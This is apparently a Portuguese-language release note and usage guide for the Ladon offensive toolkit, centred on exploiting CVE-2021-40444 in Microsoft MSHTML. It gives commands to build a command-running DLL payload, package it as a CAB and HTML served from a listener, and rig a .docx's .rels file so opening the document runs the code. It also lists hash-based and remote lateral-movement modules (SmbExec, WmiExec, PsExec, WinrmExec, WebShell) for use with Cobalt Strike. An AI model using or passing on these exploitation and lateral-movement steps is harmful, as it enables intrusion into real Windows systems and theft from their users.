
Kit de ferramentas de exploit para CVE-2021-40444 MSHTML execução remota de código, apresentando geração de payload DLL, criação de documentos Office e módulos de movimento lateral (SmbExec, WmiExec) para testes de penetração.
Em 8 de setembro, horário de Pequim, o CERT da NSFOCUS monitorou a Microsoft emitindo um aviso de segurança sobre a vulnerabilidade de execução remota de código no Microsoft MSHTML. Os atacantes podem criar controles ActiveX maliciosos para uso em documentos do Microsoft Office que utilizam o mecanismo de renderização do navegador. Ao induzir o usuário a abrir o documento malicioso, é possível executar código arbitrário no sistema alvo com as permissões desse usuário. A Microsoft informou no aviso que já detectou exploração ativa desta vulnerabilidade e pede que os usuários relevantes tomem medidas de proteção.
MSHTML (também conhecido como Trident) é o mecanismo do navegador Internet Explorer da Microsoft, também usado em aplicativos do Office para renderizar conteúdo hospedado na Web em documentos do Word, Excel ou PowerPoint. Controles ActiveX são produtos da arquitetura COM da Microsoft, amplamente utilizados no pacote Office do Windows e no navegador IE. Através de controles ActiveX, é possível interagir com o componente MSHTML.
Inclui Windows 7/8/8.1/10, Windows Server 2008/2008R2/2012/2012R2/2016/2019/2022
Ladon 8.9 2021.9.14 [+] CVE-2021-40444 Vulnerabilidade de execução remota de código no Microsoft MSHTML, módulo de exploração em documentos do Office Versões afetadas: Windows 7/8/8.1/10, Windows Server 2008/2008R2/2012/2012R2/2016/2019/2022 [+] CmdDll cmd para DLL (payload de execução de comando DLL para vulnerabilidades 0-day do Windows, pode ser usado diretamente com PowerShell para conectar ao CobaltStrike) Vulnerabilidades de estouro como MS17010, escalonamento de privilégio local CVE-2021-1675, etc. Não-estouro como a mais recente vulnerabilidade do Office CVE-2021-40444, etc.
Ladon 8.8 2021.911 [+] SmbExec NTLM-HASH execução não interativa sem retorno [u] GetInfo Nova detecção de informações de VM da VMware [u] OsScan Nova detecção de roteador Vigor [u] Nova detecção de máquinas virtuais Xen\VBOX\Hybrid\Parallels [+] GetInfo Novo cmdkey, RrpLog, drivers instalados, lista de software, arquivos acessados recentemente, etc. [+] GetInfo Novo GUID, CPUID, ID do disco, detecção de backdoor de inicialização automática (DLL, registro, etc.) [+] GetInfo2 Nova obtenção de informações de patches via WMI [+] Informações padrão: novo destaque se espaço livre na unidade C for menor que 2 GB
Usage:
Ladon CmdDll x86 calc
Ladon CmdDll x64 calc
Ladon CmdDll b64x86 YwBhAGwAYwA=
Ladon CmdDll b64x64 YwBhAGwAYwA=
Gere o DLL com o comando CMD adequado para sua necessidade. O exemplo abre a calculadora.
Usage:
Ladon CVE-2021-40444 MakeCab poc.dll
Ladon CVE-2021-40444 MakeHtml http://192.168.1.8
PS: Este módulo requer o uso de Ladon40.exe
Win10 x64 Office 2019
Qualquer versão de teste serve, não precisa ativar. Se o arquivo baixado for IMG, renomeie para ZIP e extraia para instalar.
Como o alvo é um sistema Win10 X64, usamos DLL de 64 bits. Comando: Ladon CVE-2021-40444 MakeCab sc64.dll
Gere o HTML. A URL deve apontar para o endereço onde o Ladon está escutando.
A amostra foi enviada no pequeno círculo (K8小密圈) no dia 10 de setembro. Renomeie a extensão .docx para .cab ou .zip para editar o arquivo .rels, aponte para o endereço onde o Ladon escuta (poc.html), salve e renomeie novamente para .docx.
Ao executar o arquivo .doc no Windows 10, o Ladon monitora todo o processo de requisição. O docx primeiro acessa o html, depois a vulnerabilidade carrega o arquivo CAB que empacotamos, executa o INF via CPL, carrega nossa DLL, que no exemplo abre a calculadora.
Load SmbExec
Usage:
Ladon SmbExec host user pass cmd whoami
Ladon SmbExec host user pass b64cmd dwBoAG8AYQBtAGkA
Ao executar o SmbExec no shell do Cobalt Strike com parâmetros que contêm espaços e aspas, a codificação de escape do CS pode causar problemas. Usar comandos CMD normais é complicado, por isso adicionei o parâmetro b64cmd para facilitar o uso no CS (este método foi usado no BypassUac há alguns meses, e muitos se perguntam por que não usar comandos CMD diretamente, mas quando o comando CMD contém muitos escapes, a conversão de escape CS -> CMD é trabalhosa). O comando b64cmd pode ser gerado com o LadonGUI versão 8.2 ou superior, usando a codificação Base64Unicode.
| ID | Nome do Módulo | Descrição | Uso |
|---|---|---|---|
| 1 | WmiExec | Executa comandos na porta 135 | http://k8gege.org/Ladon/WinShell.html |
| 2 | PsExec | Executa comandos na porta 445 | http://k8gege.org/Ladon/WinShell.html |
| 3 | AtExec | Executa comandos na porta 445 | http://k8gege.org/Ladon/WinShell.html |
| 4 | SshExec | Executa comandos na porta 22 | http://k8gege.org/Ladon/WinShell.html |
| 5 | JspShell | Executa comandos com uma linha JSP | http://k8gege.org/p/ladon_cs_shell.html |
| 6 | WebShell | Executa comandos via WebShell | http://k8gege.org/Ladon/webshell.html |
| 7 | WinrmExec | Executa comandos na porta 5895 | http://k8gege.org/Ladon/WinrmExec.html |
| 8 | SmbExec | Executa comandos na porta 445 usando HASH | http://k8gege.org/Ladon/SmbExec.html |
PowerLadon: https://github.com/k8gege/PowerLadon Versões anteriores: http://github.com/k8gege/Ladon/releases Versão 7.0: http://k8gege.org/Download Versão 8.9: K8小密圈